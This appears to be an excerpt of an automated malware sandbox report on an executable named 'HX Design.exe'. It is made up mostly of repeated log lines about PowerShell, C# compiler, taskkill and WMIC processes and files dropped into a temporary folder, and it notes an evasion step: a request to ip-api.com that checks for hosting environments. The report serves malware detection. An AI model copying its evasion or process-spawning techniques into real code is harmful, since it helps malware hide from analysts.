              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7922Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7637Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1838Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4249
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2572
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2751
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1091
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3442
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
